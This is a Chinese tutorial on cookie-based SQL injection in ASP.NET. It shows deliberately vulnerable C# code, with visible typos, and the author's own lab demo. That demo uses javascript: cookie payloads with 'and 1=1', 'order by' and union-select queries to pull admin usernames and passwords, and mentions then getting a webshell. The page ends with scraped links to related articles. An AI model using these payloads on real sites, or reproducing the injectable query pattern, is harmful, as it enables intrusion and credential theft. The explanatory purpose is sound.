一、SQL注入原理

我以aspx为例,现在我们来研究下Cookie注入是怎么产生的,在获取URL参数的时候,如果在代码中写成Request[“id”],这样的写法问题就出现了。我先普及下科普知识,在aspx中Request.QueryString[“id”]用于接收get提交的数据,Request.Form[“id”]用于接收post提交的数据。如果不指定使用QueryString还是Form接收数据,WEB服务是怎样读取数据的呢,他是先取GET中的数据没有取到,再取POST中的数据如果还没有,在去取Cookies中的数据。这样Cookie注入就产生了。

二、测试环境

ASP.NET+SQL server

ASP.NET代码:

Aspx文件有两个。

Default,aspx页面代码

protected void page Load(object sender,EwentArgs e)

{

string id=Request{"id"}.ToString();

string connuser=@"Data Source=;lnitial

Catalog=CookieDemo;lntegrated Sccurity=True";

string xx=Server.UrlDecode(id);

steing sql="select*from Cookie where id="=xx

SqlConncction conn=new

SqlConnection(connuser);

conn Open();

Sqlcommand comm""new

Sqlcommand(sql,conn);

SqlDataReader datare=comm,ExecureReader();

while(datare.Read())

{

Response.Write(datare{"name"}

}

conn.Close();

}

Test页面代码

<body>

<form id = "forml"runat="server">

<div>

<a href="test.aspx?id=2">Cookie测试</a>

</div>

</form>

</body>

数据库:

数据库建库建表代码我就不写出来了,为了节省点版面。

三、实战演习

我们先访问Default.aspx。点击“Cookie测试”跳转到test.aspx?id=2页面,参数为id值为“2”,test.aspx页面中显示出了数据库中id为“2”相应的值。

现在我们把地址栏中的?id=2删除掉就成了,然后在浏览,出错了。

返回了错误页面什么数据也没有,这是必然的学过脚本语言的同学很容易理解这个问题,我们没有在浏览器传达id的值,所以Request在接收id的值的时候就什么也没有获取到。这样sql语句就会出现错误,必然会返错误页面,现在我们在把地址栏中的url删除掉,在地址栏输入“javascript:alert(document.cookie="id="+escape("3"));”浏览一下弹出个提示框。

现在我们在来访问一下这个不带参数的链接,就出来了id=3的相应的值。

为了方便不懂javascript的朋友我简单介绍下。

javascript:alert(document.cookie="id="+escape("3"));的意思,我说明一下document.cookie="id="+escape("3")就是把3保存到Cookies的id中。这样在过滤了Form,QueryString提交而没有过滤Cookie的时候,就能够Cookie注入了…基本原理就是这些了,现在实战操作下……

在地址栏输入“javascript:alert(document.cookie="id="+escape("3 and 1=1¨))”提交一下,然后在在刷新下页面出现了id=3的数据。然后在地址栏输入“javascript:alert(document.cookie="id="+escape("3 and l=2"))”浏览一下弹出现在在刷新下页面出现了空白页面。

两次返回不一样证明可以注入,我用Cookie注入演示怎么爆破出管理员账号密码,和常规的sql注入一样只不过是要用到Javascript,还是先判断字段然后在地址栏输入“javascript:alert(document.cookie="id="+escape("3 order by 2"))”提交以后刷新返回正常。

然后在地址栏输入“javascript:alert(document.cookie="id="+escape("3 0rder by 3"))”,返回错误。

确定字段数为2个javascript:alert(document.cookie="id="+escape("3 union select l,'2'"))。然后刷新就爆破出了数字2相应的位置。我自己搭建的环境测试,就不猜表了admin表是管理员表,表中有id,username,pass这3个字段,在真实的渗透中这些是需要自己去猜的。现在我们提交javascript:alert(document.cookie="id="+escape("3 union select 1,username from admin"))后刷新就爆破出了用户名。然后输入javascript:alert(document.cookie="id="+escape("3 union select 1,pass from admin"))刷新下页面密码就出来了。

账号密码都有了剩下的就是想办法后台拿Webshell了,由于我没有写后台测试页面,文章就到这了。这就是Cookie注入,希望对大家有帮助,SEE YOU。

菜鸟详细解析Cookie注入原理的更多相关文章

  1. cookie注入原理详解(一)

    那我们还是围绕以下几个问题来看看cookie注入: 1.什么是cookie注入? 2.为什么要cookie注入? 3.怎样cookie注入? 1.什么是cookie注入? ♦cookie注入的原理是: ...

  2. cookie注入原理

    cookie注入原理-->红客联盟 http://www.2cto.com/article/201202/118837.html 前言: document.cookie:表示当前浏览器中的coo ...

  3. cookie注入原理及注入检测

    通常我们的开发人员在开发过程中会特别注意到防止恶意用户进行恶意的注入操作,因此会对传入的参数进行适当的过滤,但是很多时候,由于个人对安全技术了解的不同,有些开发人员只会对get,post这种方式提交的 ...

  4. Web攻防系列教程之 Cookie注入攻防实战

    摘要:随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓.很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序.这时我们用常规的手段去探测网站的SQ ...

  5. Cookie注入实战(非SQL注入)

    cookie注入原理其实很简单,就是利用了session机制中的特性,只能说是特性,不能算是漏洞. 这里简单的说下原理,session的机制就相当于你有一张蛋糕店的会员卡,这张会员卡就是你浏览器中的c ...

  6. Java程序员从笨鸟到菜鸟之(一百)sql注入攻击详解(一)sql注入原理详解

    前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误.其实sql注入漏洞就是一个.作为一个菜鸟小程 ...

  7. cookie注入的形成,原理,利用总结

    一:cookie注入的形成 程序对提交数据获取方式是直接request("c.s.t")的方式.未指明使用request对象的具体方法进行获取. 二:原理 request(&quo ...

  8. C++多态的实现及原理详细解析

    C++多态的实现及原理详细解析 作者: 字体:[增加 减小] 类型:转载   C++的多态性用一句话概括就是:在基类的函数前加上virtual关键字,在派生类中重写该函数,运行时将会根据对象的实际类型 ...

  9. jquery.cookie用法详细解析,封装的操作cookie的库有jquery.cookie.js

    jquery.cookie用法详细解析 需要注意存入cookie前,对数据进行序列化, 得到后在反序列化: 熟练运用:JSON.stringify();和JSON.parse(): 通常分为如下几个步 ...

随机推荐

  1. 使用系统用户登录Oracle

    如果数据库安装不在本机上,@后面加的是服务名或IP地址 如果是sys用户的话,它具有管理员的权限,要使用sysdba或sysoper权限来登录oracle工具.

  2. 练习:javascript淡入淡出半透明效果

    划过无透明 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF ...

  3. excel合并

    import org.apache.commons.lang.StringUtils; import org.apache.poi.hssf.usermodel.HSSFWorkbook; impor ...

  4. Stm32型号查阅手册

  5. php in_array() 循环大量数组时效率特别慢问题

    in_array() 会循环数组内部元素逐个匹配,特别耗时,换成以下方式,效率大大提升

  6. Linux 之 rsyslog+mysql+LogAnalyzer 日志收集系统

     作者:邓聪聪 LogAnalyzer 是一个 syslog 和其他网络事件数据的 Web 前端工具,提供简单易用的日志浏览.搜索和基本分析以及图表显示 由于公司部分项目需求使用日志记录系统,随笔记录 ...

  7. Django Tastypie: 贴士,技巧和故障排除

    为Resource加入字段 1.为字段实现专门的dehydrate函数 2.实现(resource级别的)dehydrate方法 3.额外的方法 排除故障 通过外键,外键的反向关系来映射一个对象的属性 ...

  8. Eclipse IDE 添加jar包到Java工程中

    操作系统:Windows 10 x64 工具1:Eclipse Java EE IDE for Web Developers. Version: Photon Release (4.8.0) 在Pac ...

  9. linux服务器安装pyspide关于rgnutls.h: No such file or directory 的解决方案

    In file included from src/docstrings.c:4:0: src/pycurl.h:148:30: fatal error: gnutls/gnutls.h: No su ...

  10. jQuery的选择器中的通配符[id^='code']或[name^='code']及jquery选择器总结

    1.选择器 (1)通配符: $("input[id^='code']");//id属性以code开始的所有input标签 $("input[id$='code']&quo ...